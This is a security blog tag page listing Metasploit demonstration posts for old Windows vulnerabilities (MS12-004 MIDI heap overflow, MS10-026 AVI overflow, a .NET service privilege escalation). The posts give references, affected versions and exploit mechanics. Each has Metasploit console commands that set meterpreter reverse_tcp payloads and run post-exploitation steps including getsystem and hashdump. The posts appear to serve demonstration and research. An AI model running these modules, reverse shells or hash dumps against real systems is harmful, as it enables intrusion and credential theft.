aka wow on ZATAZ.com
Posts tagged Windows
MS12-004 Windows Media Remote Code Execution Metasploit Demo
03 months ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered and reported to the vendor by Shane Garrett
Coordinated public release of the vulnerability the 2012-01-10
Vulnerability exploited in the wild
Metasploit PoC provided the 2012-01-27
PoC provided by :
Shane Garrett
juan vazquez
sinn3r
Reference(s) :
MS12-004
CVE-2012-0003
OSVDB-78210
Affected version(s) :
Windows XP SP3
Windows XP Media Center Edition 2005 SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP2
Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems SP2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit SP1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based SP1
Tested on Windows XP SP3 with :
winmm.dll 5.1.2600.5512
Description :
This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player’s ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than how much is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. At this time, for IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.
Commands :
use exploit/windows/browser/ms12_004_midi set SRVHOST 192.168.178.100 SET PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid
MS10-026 : Microsoft MPEG Layer-3 Audio Stack Based Overflow Metasploit Demo
09 months ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered by Yamata Li and submitted to Microsoft
Coordinated public release of the vulnerability the 2010-04-13
Metasploit PoC provided the 2011-08-12
PoC provided by :
Yamata Li
Shahin Ramezany
juan vazquez
Jordi Sanchez
Reference(s) :
CVE-2010-0480
OSVDB-63749
MS10-026 (KB977816)
Affected version(s) :
Microsoft Windows 2000 SP4
Windows XP SP2 and SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista, Windows Vista SP1, and Windows Vista SP2
Windows Vista x64, Windows Vista x64 SP1, and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Tested on Windows XP SP3 with :
Internet Explorer 6
Description :
This module exploits a buffer overlow in l3codecx.ax while processing a AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite with 0′s so the three least significant bytes of EIP saved on stack are overwritten and shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. Please note on IE 8 targets, your malicious URL must be a trusted site in order to load the .Net control.
Commands :
use exploit/windows/browser/ms10_026_avi_nsamplespersec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
getuid
sysinfo
ipconfig
EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation
01 year ago
in Exploits, Metasploit
Timeline :
Vulnerability disclosed by XenoMuta on Exploit-DB the 2011-03-08
Metasploit PoC provided by David Rude the 2011-03-08
PoC provided by :
XenoMuta
David Rude
Reference(s) :
Affected version(s) :
Microsoft .NET Framework include 4.0 and 2.0
Tested on Windows XP SP3 with :
With Microsoft.NET Framework v2.0.50727 mscorsvw.exe
Description :
This module attempts to exploit the security permissions set on the .NET Runtime Optimization service. Vulnerable versions of the .NET Framework include 4.0 and 2.0. The permissions on this service allow domain users and local power users to modify the mscorsvw.exe binary. Seem to work on Windows XP SP3, 2003 R2 & 7.
Commands :
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -jsessions -i 1
getuid
getsystem
hashdump
ps
migrate xxxx
backgrounduse post/windows/escalate/net_runtime_modify
info
show options
set LHOST 192.168.178.21
set LPORT 4445
set SESSION 1
exploitsessions -i 2
getuid
hashdump
Metasploit Exploitation Scenarios – Scenario 3 Astaro Security Gateway & Dr.Web Antivirus
01 year ago
in Metasploit
Third scenario of the Metasploit Exploitation Scenarios.
Here, the user is a standard user, protected by 5 countermeasures :
- Firewall rules how limit the outbound connexions only on special ports.
- Transparent HTTP/S Proxy for web surfing.
- Dual antivirus (Avira / Clamav) scanning for web surfing (useless in the case, due to the Astaro bugs).
- Dr.Web Antivirus on the target Windows XP.
- Windows Firewall on the target Windows XP.
Metasploit Exploitation Scenarios – Scenario 2 Lavasoft Ad-Aware & Windows Defender
01 year ago
in Metasploit
Here is the second scenario of the Metasploit Exploitation Scenarios serie. You will find here under a SlideShare presentation and an YouTube video as demonstration of the scenario. If you have any comments or suggestions don’t hesitate.
Recent Comments